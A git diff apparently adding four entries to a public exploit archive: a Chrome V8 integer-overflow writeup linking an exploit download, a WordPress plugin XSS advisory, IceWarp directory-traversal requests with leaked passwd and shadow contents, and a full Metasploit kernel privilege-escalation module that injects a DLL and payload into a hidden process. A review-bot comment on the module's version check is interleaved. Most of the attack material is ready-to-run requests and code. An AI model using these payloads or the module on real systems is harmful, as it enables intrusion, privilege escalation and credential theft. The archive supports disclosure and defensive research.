diff --git a/exploits/multiple/remote/44584.txt b/exploits/multiple/remote/44584.txt
new file mode 100644
index 000000000..080498b44
--- /dev/null
+++ b/exploits/multiple/remote/44584.txt
@@ -0,0 +1,74 @@
+There's an integer overflow in computing the required allocation size when instantiating a new javascript object.
+
+See the following code in objects.cc
+
+// static
+bool JSFunction::CalculateInstanceSizeForDerivedClass(
+ Handle function, InstanceType instance_type,
+ int requested_embedder_fields, int* instance_size,
+ int* in_object_properties) {
+ Isolate* isolate = function->GetIsolate();
+ int expected_nof_properties = 0;
+ bool result = true;
+ for (PrototypeIterator iter(isolate, function, kStartAtReceiver);
+ !iter.IsAtEnd(); iter.Advance()) {
+ Handle current =
+ PrototypeIterator::GetCurrent(iter);
+ if (!current->IsJSFunction()) break;
+ Handle func(Handle::cast(current));
+ // The super constructor should be compiled for the number of expected
+ // properties to be available.
+ Handle shared(func->shared());
+ if (shared->is_compiled() ||
+ Compiler::Compile(func, Compiler::CLEAR_EXCEPTION)) {
+ DCHECK(shared->is_compiled());
+ expected_nof_properties += shared->expected_nof_properties(); // <--- overflow here!
+ } else if (!shared->is_compiled()) {
+ // In case there was a compilation error for the constructor we will
+ // throw an error during instantiation. Hence we directly return 0;
+ result = false;
+ break;
+ }
+ if (!IsDerivedConstructor(shared->kind())) {
+ break;
+ }
+ }
+ CalculateInstanceSizeHelper(instance_type, true, requested_embedder_fields,
+ expected_nof_properties, instance_size,
+ in_object_properties);
+ return result;
+}
+
+By supplying a long prototype chain of objects with a large expected_nof_properties we can control the resulting value of instance_size by causing (requested_embedder_fields + requested_in_object_properties) << kPointerSizeLog2 to be overflown to a small negative value, resulting in an allocation smaller than header_size, which is the minimum required size for the base object class being allocated. This results in memory corruption when the object is initialised/used.
+
+void JSFunction::CalculateInstanceSizeHelper(InstanceType instance_type,
+ bool has_prototype_slot,
+ int requested_embedder_fields,
+ int requested_in_object_properties,
+ int* instance_size,
+ int* in_object_properties) {
+ int header_size = JSObject::GetHeaderSize(instance_type, has_prototype_slot);
+ DCHECK_LE(requested_embedder_fields,
+ (JSObject::kMaxInstanceSize - header_size) >> kPointerSizeLog2);
+ *instance_size =
+ Min(header_size +
+ ((requested_embedder_fields + requested_in_object_properties)
+ << kPointerSizeLog2),
+ JSObject::kMaxInstanceSize);
+ *in_object_properties = ((*instance_size - header_size) >> kPointerSizeLog2) -
+ requested_embedder_fields;
+}
+
+The attached PoC crashes current stable on linux.
+
+See crash report ID: 307546648ba8a84a
+
+Chrome issue is https://bugs.chromium.org/p/chromium/issues/detail?id=808192
+
+Attaching the working exploit for this issue.
+
+Note that issue_808192.html is a template - it requires server.py to do a version check and patch a few version dependent constants in, since some object layouts have changed during the range of Chrome versions on which the exploit was tested.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44584.zip
\ No newline at end of file
diff --git a/exploits/php/webapps/44585.txt b/exploits/php/webapps/44585.txt
new file mode 100644
index 000000000..f6ef54a19
--- /dev/null
+++ b/exploits/php/webapps/44585.txt
@@ -0,0 +1,47 @@
+# Exploit Title: WF Cookie Consent - Authenticated Persistent Cross-Site Scripting
+# Date: 23/04/2018
+# Exploit Author: B0UG
+# Vendor Homepage: http://www.wunderfarm.com/
+# Software Link: https://en-gb.wordpress.org/plugins/wf-cookie-consent/
+# Version: Tested on version 1.1.3 (older versions may also be affected)
+# Tested on: WordPress
+# Category : Webapps
+# CVE: CVE-2018-10371
+
+I. VULNERABILITY
+-------------------------
+Authenticated Persistent Cross-Site Scripting
+
+II. BACKGROUND
+-------------------------
+WF Cookie Consent is a WordPress plugin which has been designed to display cookie consent notifications on a WordPress website.
+
+III. DESCRIPTION
+-------------------------
+A authenticated persistent cross-site scripting vulnerability has been identified in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in a victim's web browser.
+
+IV. PROOF OF CONCEPT
+-------------------------
+1) Access WordPress control panel.
+2) Navigate to the 'Pages'.
+3) Add a new page and insert the script you wish to inject into the page title.
+4) Now navigate to 'Settings' and select 'WF Cookie Consent'.
+5) Your injected script will now be executed.
+
+V. IMPACT
+-------------------------
+An attacker can execute malicious code in a victim's browser to perform various activities such as stealing cookies, session tokens, credentials and personal data amongst others.
+
+VI. SYSTEMS AFFECTED
+-------------------------
+WordPress websites running "WF Cookie Consent" plugin version 1.1.3 (older versions may also be affected).
+
+VII. REMEDIATION
+-------------------------
+Implement a web application such as Wordfence or uninstall the plugin.
+
+VIII. DISCLOSURE TIMELINE
+-------------------------
+April 23, 2018 1: Vulnerability identified.
+April 23, 2018 2: Informed developer of the vulnerability.
+May 2, 2018 3: No reply from the developer.
\ No newline at end of file
diff --git a/exploits/php/webapps/44587.txt b/exploits/php/webapps/44587.txt
new file mode 100644
index 000000000..3bacf8633
--- /dev/null
+++ b/exploits/php/webapps/44587.txt
@@ -0,0 +1,119 @@
+Vendor: IceWarp (http://www.icewarp.com)
+Product: IceWarp Mail Server
+Version affected: 11.1.1 and below
+
+Product description:
+IceWarp WebMail provides web-based access to email, calendars, contacts, files and shared data from any computer with a browser and Internet connection.
+IceWarp Mail Server is a commercial mail and groupware server developed by IceWarp Ltd. It runs on Windows and Linux.
+
+Finding 1: Multiple Unauthenticated Directory traversal
+Credit: Piotr Karolak of Trustwave's SpiderLabs
+CVE: CVE-2015-1503
+CWE: CWE-22
+
+#Proof of Concept
+
+The unauthenticated Directory Traversal vulnerability can be exploited by
+issuing a specially crafted HTTP GET request to the
+/webmail/client/skins/default/css/css.php. Directory Traversal is a
+vulnerability which allows attackers to access restricted directories and
+execute commands outside of the web server's root directory.
+
+This vulnerability affects /-.._._.--.._1416610368(variable, depending on
+the installation, need to check page
+source)/webmail/client/skins/default/css/css.php.
+
+Attack details
+URL GET input file was set to ../../../../../../../../../../etc/passwd
+
+Proof-of-Concept:
+
+The GET or POST request might be sent to the host A.B.C.D where the IceWarp mail server is running:
+
+REQUEST
+=======
+GET /-.._._.--.._1416610368/webmail/client/skins/default/css/css.php?file=../../../../../../../../../../etc/passwd&palette=default&skin=default HTTP/1.1
+Referer: http://a.b.c.d/
+Cookie: PHPSESSID_BASIC=wm-54abaf5b3eb4d824333000; use_cookies=1; lastLogin=en%7Cbasic; sess_suffix=basic; basic_disable_ip_check=1; lastUsername=test; language=en
+Host: a.b.c.d
+Connection: Keep-alive
+Accept-Encoding: gzip,deflate
+Accept: */*
+
+
+RESPONSE:
+=========
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+
+....TRUNCATED
+
+test:x:1000:1000:test,,,:/home/test:/bin/bash
+smmta:x:116:125:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
+smmsp:x:117:126:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
+mysql:x:118:127:MySQL Server,,,:/nonexistent:/bin/false
+
+The above proof-of-concept would retrieve the /etc/passwd file (the
+response in this example has been truncated).
+
+#Proof of Concept
+
+The unauthenticated Directory Traversal vulnerability can be exploited by
+issuing a specially crafted HTTP GET and POST request payload
+..././..././..././..././..././..././..././..././..././..././etc/shadow
+submitted in the script and/or style parameter. Directory Traversal is a
+vulnerability which allows attackers to access restricted directories and
+execute commands outside of the web server's root directory.
+
+The script and style parameters are vulnerable to path traversal attacks,
+enabling read access to arbitrary files on the server.
+
+REQUEST 1
+=========
+
+GET /webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fshadow HTTP/1.1
+Host: a.b.c.d
+Accept: */*
+Accept-Language: en
+Connection: close
+Referer: http://a.b.c.d/webmail/old/calendar/index.html?_n[p][content]=event.main&_n[p][main]=win.main.public&_n[w]=main
+Cookie: use_cookies=1; PHPSESSID_LOGIN=08dj6q5s8tlmn126fo3vg80n47; sess_suffix=basic; lastUsername=test; PHPSESSID_CALENDAR=ji3306tg3fecg1foun2ha6dnu1; GUI=advanced; LANG=TURKISH; PHPSESSID_BASIC=wm-54a5b90472921449948637; lastLogin=en%7Cpda; prefered_version=0; PHPSESSID_PDA=ji3306tg3fecg1foun2ha6dnu1; language=en
+
+REQUEST 2
+=========
+
+GET /webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fshadow HTTP/1.1
+Host: a.b.c.d
+Accept: */*
+Accept-Language: en
+Connection: close
+Cookie: use_cookies=1; PHPSESSID_LOGIN=08dj6q5s8tlmn126fo3vg80n47; sess_suffix=basic; lastUsername=test; PHPSESSID_CALENDAR=ji3306tg3fecg1foun2ha6dnu1; GUI=advanced; LANG=TURKISH; PHPSESSID_BASIC=wm-54a5b90472921449948637; lastLogin=en%7Cpda; prefered_version=0; PHPSESSID_PDA=ji3306tg3fecg1foun2ha6dnu1; language=en
+
+RESPONSE
+========
+HTTP/1.1 200 OK
+Connection: close
+Server: IceWarp/11.1.1.0
+Date: Thu, 03 Jan 2015 06:44:23 GMT
+Content-type: text/javascript; charset=utf-8
+
+root:!:16436:0:99999:7:::
+daemon:*:16273:0:99999:7:::
+bin:*:16273:0:99999:7:::
+sys:*:16273:0:99999:7:::
+sync:*:16273:0:99999:7:::
+games:*:16273:0:99999:7:::
+man:*:16273:0:99999:7:::
+lp:*:16273:0:99999:7:::
+
+....TRUNCATED
+
+lightdm:*:16273:0:99999:7:::
+colord:*:16273:0:99999:7:::
+hplip:*:16273:0:99999:7:::
+pulse:*:16273:0:99999:7:::
+test:$1$Duuk9PXN$IzWNTK/hPfl2jzhHmnrVL.:16436:0:99999:7:::
+smmta:*:16436:0:99999:7:::
+smmsp:*:16436:0:99999:7:::
+mysql:!:16436:0:99999:7:::
\ No newline at end of file
diff --git a/exploits/windows_x86-64/local/44586.rb b/exploits/windows_x86-64/local/44586.rb
new file mode 100755
index 000000000..d5bc962e4
--- /dev/null
+++ b/exploits/windows_x86-64/local/44586.rb
@@ -0,0 +1,113 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/post/windows/reflective_dll_injection'
+class MetasploitModule < Msf::Exploit::Local
+ Rank = NormalRanking
+
+ include Msf::Post::File
+ include Msf::Post::Windows::Priv
+ include Msf::Post::Windows::Process
+ include Msf::Post::Windows::FileInfo
+ include Msf::Post::Windows::ReflectiveDLLInjection
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Windows WMI Recieve Notification Exploit',
+ 'Description' => %q(
+ This module exploits an uninitialized stack variable in the WMI subsystem of ntoskrnl.
+ This module has been tested on vulnerable builds of Windows 7 SP0 x64 and Windows 7 SP1 x64.
+ ),
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'smmrootkit', # crash code
+ 'de7ec7ed', # exploit code
+ 'de7ec7ed', # msf module
+ ],
+ 'Arch' => [ARCH_X64],
+ 'Platform' => 'win',
+ 'SessionTypes' => ['meterpreter'],
+ 'DefaultOptions' => {
+ 'EXITFUNC' => 'thread'
+ },
+ 'Targets' => [
+ ['Windows 7 SP0/SP1', { 'Arch' => ARCH_X64 }]
+ ],
+ 'Payload' => {
+ 'Space' => 4096,
+ 'DisableNops' => true
+ },
+ 'References' => [
+ ['CVE', '2016-0040'],
+ ['MSB', 'MS16-014'],
+ ['URL', 'https://github.com/de7ec7ed/CVE-2016-0040'],
+ ['URL', 'https://github.com/Rootkitsmm/cve-2016-0040'],
+ ['URL', 'https://technet.microsoft.com/en-us/library/security/ms16-014.aspx']
+ ],
+ 'DisclosureDate' => 'Dec 4 2015',
+ 'DefaultTarget' => 0)
+ )
+ end
+
+ def check
+ # Windows 7 SP0/SP1 (64-bit)
+
+ if sysinfo['OS'] !~ /windows/i
+ return Exploit::CheckCode::Unknown
+ end
+
+ file_path = expand_path('%windir%') << '\\system32\\ntoskrnl.exe'
+ major, minor, build, revision, branch = file_version(file_path)
+ vprint_status("ntoskrnl.exe file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
+
+ return Exploit::CheckCode::Safe if build > 7601
+
+ return Exploit::CheckCode::Appears
+ end
+
+ def exploit
+ if is_system?
+ fail_with(Failure::None, 'Session is already elevated')
+ end
+
+ check_result = check
+ if check_result == Exploit::CheckCode::Safe || check_result == Exploit::CheckCode::Unknown
+ fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
+ end
+
+ if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
+ fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
+ end
+
+ print_status('Launching notepad to host the exploit...')
+ notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)
+ begin
+ process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
+ print_good("Process #{process.pid} launched.")
+ rescue Rex::Post::Meterpreter::RequestError
+ # Reader Sandbox won't allow to create a new process:
+ # stdapi_sys_process_execute: Operation failed: Access is denied.
+ print_status('Operation failed. Trying to elevate the current process...')
+ process = client.sys.process.open
+ end
+
+ print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
+ library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-0040', 'CVE-2016-0040.x64.dll')
+ library_path = ::File.expand_path(library_path)
+
+ print_status("Injecting exploit into #{process.pid}...")
+ exploit_mem, offset = inject_dll_into_process(process, library_path)
+
+ print_status("Exploit injected. Injecting payload into #{process.pid}...")
+ payload_mem = inject_into_process(process, payload.encoded)
+
+ # invoke the exploit, passing in the address of the payload that
+ # we want invoked on successful exploitation.
+ print_status('Payload injected. Executing exploit...')
+ process.thread.create(exploit_mem + offset, payload_mem)
+
+ print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
+ end
+end
\ No newline at end of file
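Review bot: `check` decides from the build number alone (`return Exploit::CheckCode::Safe if build > 7601`), so every kernel whose build is at or below 7601 is reported as Appears, including version families the module's own `Targets` entry does not cover, and `exploit` then proceeds on those hosts because it only refuses Safe and Unknown; `major` and `minor` are read from `file_version` and printed but never compared. A kernel exploit run against an untargeted build is far more likely to crash the host than to elevate, so the check should at least confine itself to the version family the module claims to support, e.g. `return Exploit::CheckCode::Safe unless major == 6 && minor == 1` before the build comparison, and the `Description` should say that patched 7601 builds are not distinguished by this check. Two style points in the same hunk: the `Name` string misspells "Receive" as "Recieve" (the typo is carried into the new files_exploits.csv row as well), and `'de7ec7ed'` appears twice in `Author`, once per role, where one entry with a combined comment would read better.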
diff --git a/files_exploits.csv b/files_exploits.csv
index fd47333cf..589697960 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -9700,6 +9700,7 @@ id,file,description,date,author,type,platform,port
 44565,exploits/windows/local/44565.py,"Easy MPEG to DVD Burner 1.7.11 - Local Buffer Overflow (SEH)",2018-05-02,"Marwan Shamel",local,windows,
 44573,exploits/windows/local/44573.txt,"Adobe Reader PDF - Client Side Request Injection",2018-05-02,"Alex Inführ",local,windows,
 44581,exploits/windows/local/44581.c,"Windows - Local Privilege Escalation",2018-04-24,XPN,local,windows,
+44586,exploits/windows_x86-64/local/44586.rb,"Windows WMI - Recieve Notification Exploit (Metasploit)",2018-05-04,Metasploit,local,windows_x86-64,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16468,6 +16469,7 @@ id,file,description,date,author,type,platform,port
 44576,exploits/hardware/remote/44576.sh,"GPON Routers - Authentication Bypass / Command Injection",2018-05-03,vpnmentor,remote,hardware,
 44577,exploits/hardware/remote/44577.py,"TBK DVR4104 / DVR4216 - Credentials Leak",2018-05-02,ezelf,remote,hardware,
 44582,exploits/windows/remote/44582.txt,"Call of Duty Modern Warefare 2 - Buffer Overflow",2018-05-02,momo5502,remote,windows,
+44584,exploits/multiple/remote/44584.txt,"Google Chrome V8 - Object Allocation Size Integer Overflow",2018-05-04,"Google Security Research",remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39276,3 +39278,5 @@ id,file,description,date,author,type,platform,port
 44567,exploits/php/webapps/44567.txt,"Cockpit CMS 0.4.4 < 0.5.5 - Server-Side Request Forgery",2018-05-02,"Qian Wu_ Bo Wang_ Jiawang Zhang",webapps,php,80
 44580,exploits/hardware/webapps/44580.txt,"DLINK DCS-5020L - Remote Code Execution (PoC)",2018-03-27,"Fidus InfoSecurity",webapps,hardware,
 44583,exploits/multiple/webapps/44583.txt,"Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection",2014-01-14,"Takeshi Terada",webapps,multiple,
+44585,exploits/php/webapps/44585.txt,"WordPress Plugin WF Cookie Consent 1.1.3 - Cross-Site Scripting",2018-05-04,B0UG,webapps,php,
+44587,exploits/php/webapps/44587.txt,"IceWarp Mail Server < 11.1.1 - Directory Traversal",2018-05-04,"Trustwave's SpiderLabs",webapps,php,